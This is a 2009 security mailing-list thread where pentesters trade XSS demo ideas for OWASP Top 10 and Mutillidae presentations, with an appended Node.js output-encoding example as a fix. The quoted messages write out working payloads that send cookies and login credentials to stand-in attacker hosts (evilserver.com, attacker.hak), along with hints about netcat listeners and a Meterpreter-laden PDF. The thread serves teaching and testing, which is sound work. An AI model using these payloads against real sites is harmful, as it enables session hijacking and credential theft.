While all these samples are really fun, I've lately had great luck by
making two different XSS attacks when I'm showing folks.

One for the devs -- this tends to be a bit more "fun" and does stuff
like click trapping.

For marketing or the project managers -- the ones I've found most
likely to sweep these bugs under the rug -- I send them "brand damage"
examples.  (Cock ring size is freaking hilarious, but would send me to
HR).  So I do things like image swapping, or setting the background to
a LOLCat or a competitor logo.

The all-time XSS FTW moment was about 4 years ago now, when someone
found an XSS problem on a McDonald's site.  Their link was so damn
sweet, it's what got me interested in web app security.  When you
clicked it, you were sent to a page that had all the McD's wrappings, but
the content section of the window was blank except for, in lovely red
letters, it said: "Hey FATTIE! You really shouldn't be eating our
food!"



On Fri, May 29, 2009 at 3:35 AM,  <[email protected]> wrote:
> You could use a couple of typical password/cookie stealing examples.
>
> Cookie stealing iframe:
> "><IFRAME
> SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie";
> height="1" width="1" frameborder="0"></IFRAME>
>
> Altering the logon form:
> "><script>window.onload =
> function()document.loginForm.action='http://evilserver.com/evil.php?details='</script><!----
>
> I like to use the logon form example for my penetration testing
> presentations as it looks 100% normal to the user, except it redirects the
> Submit button to send the logon information (username/password in most
> cases) to your evilserver instead of the real server. You can also rewrite
> the code in the user's browser to remove password hashing to make it easier
> to get the clear text password. On the server end I usually just put up a
> Metasploit HTTP or a netcat listener on the evilserver.com address to output
> the traffic to a logfile. You can also log it to a database for mass farming
> of data, but we don't do that kind of thing, we leave that to Bob ;)
>
> If you want something evil on the client-side, try an iframe that references
> a PDF file. You can then export a PDF from Metasploit and embed the
> Meterpreter payload for total world domination.
>
> Chris John Riley
>
> [email protected]@inet wrote on 28.05.2009 20:50:39:
>
>> Ok, I've got yet another presentation coming up, this time on the OWASP
>> Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The
>> canonical example of course is:
>>
>> <script>alert("XSS");</script>
>>
>> but that is boring, and gives folks the impression that XSS is not that
>> serious.  Better short examples would be:
>>
>> Redirect traffic to your site:
>> <script>window.location = "http://www.irongeek.com/";</script>
>>
>> A little cookie grabbing:
>> <script>
>> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
>> </script>
>>
>> Or maybe a password form to make people think they have to login, but it
>> just grabs the credentials:
>> <script>
>> username=prompt('Please enter your username',' ');
>> password=prompt('Please enter your password',' ');
>> document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
>> </script>
>>
>> What are other cool things to inject, besides maybe BeEF, that show off how
>> XSS can be a big deal?
>>
>> Thanks,
>> Adrian
>> _______________________________________________
>> Pauldotcom mailing list
>> [email protected]
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com
> ----------------------------------------
> Raiffeisen Informatik GmbH, company register no. 88239p, Commercial Court of
> Vienna, DVR 0486809, UID ATU 16351908
>
> Correspondence with above mentioned sender via e-mail is only for
> information purposes. This medium may not be used for exchange of
> legally-binding communications.
> ----------------------------------------
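As an added defensive example that is not part of this thread or of Mutillidae: a minimal contextual HTML encoder in JavaScript (Node.js), run against inputs constructed to resemble the quoted payloads, showing that one encoding step at the output point turns the `">` attribute breakout and the bare `<script>` injection into inert text. Function and variable names are my own.

```javascript
// Added example (not from the thread): output encoding as the fix for the
// reflected XSS demos quoted above. Plain Node.js, no dependencies.

// Encode a string for insertion into HTML element content or a
// double-quoted attribute value. Every character that can change the HTML
// parser's state is replaced with an entity, so the browser treats the
// whole value as text rather than as markup.
function encodeForHtml(untrusted) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable rendering: the search term is concatenated straight into the
// value attribute, so a leading "> closes the attribute and the tag.
function renderSearchUnsafe(query) {
  return `<input type="text" name="q" value="${query}">`;
}

// Fixed rendering: same template, value encoded first.
function renderSearchSafe(query) {
  return `<input type="text" name="q" value="${encodeForHtml(query)}">`;
}

// Rough tag counter used only to make the difference visible: the safe
// output should contain exactly the one <input> tag we emitted.
function countTags(html) {
  return (html.match(/<[a-zA-Z!\/]/g) || []).length;
}

// Constructed inputs modelled on the quoted payloads (attribute breakout
// into an IFRAME, a bare script tag, and a breakout followed by a comment
// opener that swallows the rest of the page).
const PAYLOADS = [
  '"><IFRAME SRC="javascript:alert(1)" height="1" width="1"></IFRAME>',
  '<script>alert("XSS");</script>',
  '"><script>window.onload=function(){}</script><!--',
];

// Returns [unsafeTagCount, safeTagCount] per payload for inspection.
function compare() {
  return PAYLOADS.map((p) => [
    countTags(renderSearchUnsafe(p)),
    countTags(renderSearchSafe(p)),
  ]);
}
```

Encoding is per context: this encoder covers element text and quoted attribute values, while data placed inside a script block, a URL, or a style rule needs the encoder for that context, and a Content-Security-Policy that disallows inline script adds a second layer if the encoding is ever missed.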